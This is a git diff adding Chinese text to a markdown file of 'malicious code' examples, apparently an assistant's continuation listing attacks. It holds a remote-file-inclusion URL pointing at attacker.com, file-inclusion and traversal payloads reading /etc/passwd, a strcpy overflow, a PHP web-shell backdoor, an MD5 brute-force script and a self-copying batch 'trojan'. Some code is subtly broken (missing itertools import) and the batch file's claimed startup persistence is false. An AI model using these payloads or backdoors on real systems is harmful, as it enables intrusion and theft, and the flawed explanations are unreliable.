--- a/250601/恶意代码-250601-01.md
+++ b/250601/恶意代码-250601-01.md
@@ -82,3 +82,148 @@ SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'
 这将触发XSS攻击，弹出一个警告框。
 
 这些只是一些基本的例子，实际的恶意代码可以复杂得多，并且可以结合多种技术来实现更复杂的攻击。
+
+
+
+当然，这里还有更多恶意代码的例子，涵盖不同类型的攻击和恶意行为：
+
+### 远程文件包含（RFI）
+
+这个PHP代码可以用于远程文件包含攻击，假设有一个脚本允许用户指定要包含的文件：
+
+```php
+<?php
+include($_GET['page']);
+?>
+```
+
+攻击者可以通过URL传递一个远程文件的路径：
+
+```
+http://example.com/vulnerable.php?page=http://attacker.com/malicious.php
+```
+
+这样，攻击者的恶意PHP文件将被包含并执行。
+
+### 本地文件包含（LFI）
+
+这个PHP代码可以用于本地文件包含攻击，假设有一个脚本允许用户指定要包含的本地文件：
+
+```php
+<?php
+include($_GET['file']);
+?>
+```
+
+攻击者可以通过URL传递一个本地文件的路径，例如：
+
+```
+http://example.com/vulnerable.php?file=../../../../etc/passwd
+```
+
+这将导致服务器泄露敏感的系统文件内容。
+
+### 目录遍历攻击
+
+这个代码可以用于目录遍历攻击，假设有一个脚本允许用户下载文件，但没有正确验证文件路径：
+
+```php
+<?php
+$file = $_GET['file'];
+header('Content-Disposition: attachment; filename="' . basename($file) . '"');
+readfile($file);
+?>
+```
+
+攻击者可以通过URL传递一个相对路径，例如：
+
+```
+http://example.com/download.php?file=../../../../etc/passwd
+```
+
+这将导致服务器泄露敏感的系统文件内容。
+
+### 缓冲区溢出攻击
+
+这个C代码示例展示了一个简单的缓冲区溢出漏洞：
+
+```c
+#include <stdio.h>
+#include <string.h>
+
+void vulnerable_function(char *str) {
+    char buffer[10];
+    strcpy(buffer, str);
+    printf("Buffer contains: %s\n", buffer);
+}
+
+int main(int argc, char **argv) {
+    if (argc > 1) {
+        vulnerable_function(argv[1]);
+    }
+    return 0;
+}
+```
+
+如果传递一个超过10字符的字符串，将导致缓冲区溢出，可能导致程序崩溃或执行恶意代码。
+
+### 后门程序
+
+这个PHP代码可以用于创建一个后门程序，允许攻击者执行任意PHP代码：
+
+```php
+<?php
+if (isset($_GET['cmd'])) {
+    system($_GET['cmd']);
+}
+?>
+```
+
+攻击者可以通过URL传递命令，例如：
+
+```
+http://example.com/backdoor.php?cmd=ls -la
+```
+
+这将在服务器上执行 `ls -la`命令，并返回结果。
+
+### 密码破解
+
+这个Python脚本可以用于简单的密码破解，通过暴力破解方法尝试所有可能的组合：
+
+```python
+import hashlib
+
+def brute_force_hash(hash_to_crack, charset, max_length):
+    for length in range(1, max_length + 1):
+        for guess in itertools.product(charset, repeat=length):
+            guess = ''.join(guess)
+            if hashlib.md5(guess.encode()).hexdigest() == hash_to_crack:
+                return guess
+    return None
+
+hash_to_crack = '5f4dcc3b5aa765d61d8327deb882cf99'  # 例如，'password'的MD5哈希值
+charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
+max_length = 8
+
+password = brute_force_hash(hash_to_crack, charset, max_length)
+if password:
+    print(f'Cracked password: {password}')
+else:
+    print('Password not found.')
+```
+
+### 木马程序
+
+这个Windows批处理脚本可以用于创建一个简单的木马程序，隐藏在一个看似无害的文件中：
+
+```batch
+@echo off
+copy %0 C:\Windows\System32\malware.bat
+echo Malware installed!
+pause
+```
+
+这个脚本会将自己复制到系统目录中，并在启动时执行。
+
+这些例子展示了不同类型的恶意代码和攻击手段。实际应用中，恶意代码可以更加复杂和多变，结合多种技术来实现更高效的攻击。
